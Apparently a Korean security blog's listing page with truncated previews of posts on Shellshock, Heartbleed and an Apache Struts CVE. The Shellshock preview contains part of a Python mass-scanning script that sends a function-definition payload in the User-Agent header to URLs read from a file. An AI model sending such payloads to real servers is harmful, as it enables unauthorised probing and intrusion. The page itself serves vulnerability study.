2. Information Security/5. Vulnerabilities3 3. CVE-2014-6271 (ShellShock) #Title: Shell Shock Auto Exploitation Script # Author: Rafay Baloch import requests,sys if (len(sys.argv) < 2): print "Usage: shocktest.py file.txt" exit(0) def main(): file = sys.argv[1] with open(file) as f: file = f.read().splitlines() for url in file: cmd="() { test;};/bin/nopatchobfu" headers = {'user-agent': cmd} r=requests.get(url, headers=headers) if r.status_code == 500: print url,"is V.. 2020. 6. 9. 2. CVE-2014-0160 (Heartbleed) #!/usr/bin/python # Modified by Travis Lee # Last Updated: 4/21/14 # Version 1.16 # # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line de.. 2020. 6. 9. 1. CVE-2017-1278 (Aapache Struts) www.youtube.com/watch?v=-A2p_94Jwso 2020. 6. 9. 이전 1 다음
